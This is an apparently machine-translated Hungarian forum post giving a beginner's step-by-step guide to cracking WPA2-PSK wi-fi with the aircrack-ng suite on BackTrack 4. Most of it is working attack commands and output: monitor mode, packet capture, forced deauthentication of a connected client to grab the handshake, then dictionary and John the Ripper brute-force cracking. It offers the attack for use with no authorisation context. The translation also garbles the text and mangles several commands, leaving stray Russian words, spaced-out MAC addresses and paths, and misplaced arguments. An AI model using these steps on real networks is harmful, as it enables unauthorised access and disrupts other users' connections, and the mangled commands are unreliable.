Hacking wi-fi kezdőknek
Hacking wi-fi kezdőknek.
Hacking wi-fi kezdőknek.
hogyan kell megkerülni a védelmet pontok és hogyan kell generálni hash repedések WPA keresztül airolib-ng
Re: Breaking wi-fi kezdőknek.
Hozzáadott után 23 óra 41 perc
WPA hack.
Fogom használni Dlink DWL-G122 (USB), vezeték nélküli hálózati csatoló ezt az eljárást. A backtrack4, felismerte az eszközt wlan0.
Először is, tedd be a kártyát monitor mód:
Interface Chipset illesztőprogram
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (szülő: wifi0)
ATH1 Atheros madwifi-ng VAP (szülő: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
# Airmon-ng indul wlan0
Interface Chipset illesztőprogram
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (szülő: wifi0)
ATH1 Atheros madwifi-ng VAP (szülő: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(Monitor üzemmód engedélyezve mon0)
.
Nos, most már tudjuk használni a felületet mon0
Keressünk egy vezeték nélküli hálózat, amely WPA2 / PSK
BSSID PWR Beacons #data, # / s CH MB ENC CIPHER AUTH ESSID
00: 19: 5B: 52: AD: F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate elveszett csomagok Probe
00: 19: 5B: 52: AD: F7 00: 1C: BF: 90: 5B: A3 -29 0- 12 január 4 TestNet
Megáll airodump-ng (ctrl + c), majd futtassa újra, valami, hogy írják le az összes csomagot a lemezen
airodump-ng mon0 --channel --bssid 10 00: 19: 5B: 52: AD: F7 -w / tmp / WPA2
Ezen a ponton, akkor két lehetőség van: vagy várjon, amíg a kliens csatlakozni, és 4-kézfogás nem fejeződik, vagy deauthenticate meglévő ügyfelek, és így AP újratársításához. Az idő pénz, úgyhogy győződjön erő deauthenticate. Meg kell kezdeni beírásával aireplay-ng BSSID AP (ek) és a MAC a csatlakoztatott kliens (c)
# Aireplay-ng -0 -a 1 00: 19: 5B: 52: AD: F7 -c 00: 1C: BF: 90: 5B: A3 mon0
13:04:19 Várakozás beacon keret (BSSID: 00: 19: 5B: 52: AD: F7) csatornán 10
13:04:20 küldése 64 irányított DeAuth. STMAC: [00: 1C: BF: 90: 5B: A3] [67 | 66 ACK]
Ennek eredményeként airodump-ng ukazhet „WPA kézfogás:” a jobb felső sarokban
BSSID PWR RXQ lámpákhoz #data, # / s CH MB ENC CIPHER AUTH ESSID
00: 19: 5B: 52: AD: F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate elveszett csomagok Probe
00: 19: 5B: 52: AD: F7 00: 1C: BF: 90: 5B: A3 -27 54-54 0230
Ostanovite airodump-ng és biztosítja, hogy a fájl jön létre megfelelően
root @ bt: / # ls / tmp / WPA2 * -al
2 módja van bruteforcing: az egyik, hogy viszonylag gyorsan, de nem garantálja a sikert, és az egyik, hogy nagyon lassú, de ez biztosítja, hogy megtalálja a kulcsot egy bizonyos idő után.
Az első lehetőség a használata a munkalistában / szótár fájlt. Sok ilyen fájlokat, megtalálható az interneten, vagy előállíthatók olyan eszközök segítségével, mint például John the Ripper. Ha ezt a szót lista létrehozása, mindössze annyit kell tennie, hogy fut aircrack-ng helyett fájlt kézfogás és szókincs word.txt
aircrack-ng -w /tmp/wordlists/word.lst -B 00: 19: 5B: 52: AD: F7 /tmp/wpa2*.cap
A második módszer (bruteforcing) sikeres lesz, az biztos, de lehet, hogy hosszú időt vesz igénybe. befejezéséhez. Tartsuk szem előtt, WPA2 kulcs lehet maximum 64 karakter, így elméletileg az, hogy létrejöjjön valamennyi kombinációját jelszavakat minden karakterkészlet és etetni őket aircrack sokáig. Ha a használni kívánt John The Ripper, hogy hozzon létre az összes lehetséges jelszó kombinációt, és etetni őket aircrack-NG, az a parancs használata:
# / Pentest / jelszó / JTR / John --stdout --incremental: minden | aircrack-ng -b 00: 19: 5B: 52: AD: F7 -w - /tmp/wpa2*.cap